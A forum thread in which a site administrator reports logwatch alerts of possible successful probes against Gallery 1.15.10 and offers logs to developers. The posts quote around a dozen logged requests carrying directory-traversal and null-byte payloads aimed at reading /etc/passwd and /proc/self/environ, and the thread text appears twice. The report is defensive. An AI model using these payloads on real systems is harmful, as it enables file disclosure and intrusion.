Security -- Possible successful probes

rioguia

Joined: 2003-12-20
Posts: 22

Posted: Thu, 2009-05-07 01:33

I have received logwatch warnings about possible successful probes apparently referencing gallery 1.15.10 version software.
/gallery/album_list.php/?sl=../../../../../../../etc/passwd%00? HTTP Response 200
/gallery/index.php?sl=../../../../../../../etc/passwd%00? HTTP Response 200

I would be happy to provide logs and other information to a developer.

rioguia

Joined: 2003-12-20
Posts: 22

Posted: Thu, 2009-05-07 10:00

Results from last night's logwatch

A total of 13 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):

//index.php?sl=./../../../../../../../etc/passwd%00 HTTP Response 200
/gallery/slideshow.php?mode=low&set_albumName=album167//index.php?sl=../../../../../../../../../../../../../etc/passwd%00
HTTP Response 200
/gallery//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP
Response 200
/?&mailform/index.php?sl=../../../../../../../../../../../../../etc/passwd%00
HTTP Response 200
/?&mailform/index.php?sl=../../../../../../../etc/passwd%00 HTTP Response 200
/?Guest_Book//index.php?sl=../../../../../../../../../../../../../etc/passwd%00
HTTP Response 200
/?Guest_Book/index.php?sl=../../../../../../../../../../../../../etc/passwd%00
HTTP Response 200
/index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response
200
/index.php?sl=./../../../../../../../proc/self/environ%00 HTTP Response 200
/gallery/album_list.php/?sl=../../../../../../../../../../../../../etc/passwd%00
HTTP Response 200
//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP
Response 200
/index.php?sl=./../../../../../../../etc/passwd%00 HTTP Response 200
/gallery/slideshow.php?mode=applet&set_albumName=album194//index.php?sl=../../../../../../../../../../../../../etc/passwd%00
HTTP Response 200

rioguia Joined: 2003-12-20 Posts: 22	Posted: Thu, 2009-05-07 01:33
	I have received logwatch warnings about possible successful probes apparently referencing gallery 1.15.10 version software. /gallery/album_list.php/?sl=../../../../../../../etc/passwd%00? HTTP Response 200 /gallery/index.php?sl=../../../../../../../etc/passwd%00? HTTP Response 200 I would be happy to provide logs and other information to a developer.
	XUser login Username: * Password: * Create new account Request new password
rioguia Joined: 2003-12-20 Posts: 22	Posted: Thu, 2009-05-07 10:00
	Results from last night's logwatch A total of 13 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit): //index.php?sl=./../../../../../../../etc/passwd%00 HTTP Response 200 /gallery/slideshow.php?mode=low&set_albumName=album167//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /gallery//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /?&mailform/index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /?&mailform/index.php?sl=../../../../../../../etc/passwd%00 HTTP Response 200 /?Guest_Book//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /?Guest_Book/index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /index.php?sl=./../../../../../../../proc/self/environ%00 HTTP Response 200 /gallery/album_list.php/?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 //index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /index.php?sl=./../../../../../../../etc/passwd%00 HTTP Response 200 /gallery/slideshow.php?mode=applet&set_albumName=album194//index.php?sl=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200

Security -- Possible successful probes

XUser login